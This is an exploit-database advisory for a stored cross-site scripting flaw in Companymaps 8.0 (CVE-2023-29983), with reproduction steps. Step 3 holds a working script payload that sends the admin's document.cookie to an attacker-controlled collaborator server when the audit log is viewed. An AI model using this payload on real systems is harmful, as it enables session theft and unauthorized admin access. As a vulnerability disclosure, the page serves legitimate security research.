header-logo
Suggest Exploit
vendor:
Companymaps
by:
Lucas Noki (0xPrototype)
5.4
CVSS
MEDIUM
Stored Cross Site Scripting (XSS)
79
CWE
Product Name: Companymaps
Affected Version From: 8
Affected Version To: 8
Patch Exists: NO
Related CWE: CVE-2023-29983
CPE: a:vogtmh:companymaps:8.0
Metasploit:
Other Scripts:
Platforms Tested: Mac, Windows, Linux
2023

Companymaps V8.0 – Stored Cross Site Scripting (XSS)

The Companymaps V8.0 software is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can send a malicious payload via the 'token' parameter to the '/rest/update/?token=' endpoint, which will be executed when an admin accesses the auditlog tab. This allows the attacker to steal the admin's cookie and potentially gain unauthorized access to the application.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and implement proper output encoding to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

Navigation

Suggest Exploit

Services By CQR